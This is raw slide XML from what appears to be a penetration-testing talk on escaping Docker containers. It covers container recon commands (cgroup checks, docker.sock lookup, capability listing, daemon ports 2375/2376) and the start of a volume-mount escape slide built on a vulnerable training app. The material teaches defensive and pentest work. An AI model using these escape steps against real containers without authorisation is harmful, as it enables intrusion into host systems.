          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="6356350"/>
            <a:ext cx="2245360" cy="3651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715392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pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>Common Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>Misconfigurations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249487"/>
            <a:ext cx="9905999" cy="3541714"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>volume mounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>containers with --privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unauthenticated Docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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8999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pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RECON</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2001520"/>
            <a:ext cx="10237788" cy="392176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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hostname - In HEX value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a range from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>02:42:ac:11:00:00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>02:42:ac:11:ff:ff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>List of running processes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> aux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Small number of processes generally indicate a container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CGROUPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– should show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> process running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check for existence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls -al /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for container capabilities: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>capsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>–print</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2375</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2376</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> daemon ports</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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073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additive="base">
                                        <p:cTn id="2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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="3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additive="base">
                                        <p:cTn id="3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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="49"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xEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55"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pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="836610" y="353315"/>
            <a:ext cx="10674670" cy="1137442"/>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lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Misconfigured Volume mounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249487"/>
            <a:ext cx="9905999" cy="3541714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1"/>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463550" indent="-23177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682625" indent="-219075" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="―"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="914400" indent="-231775"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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1146175" indent="-231775"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2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> run --name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
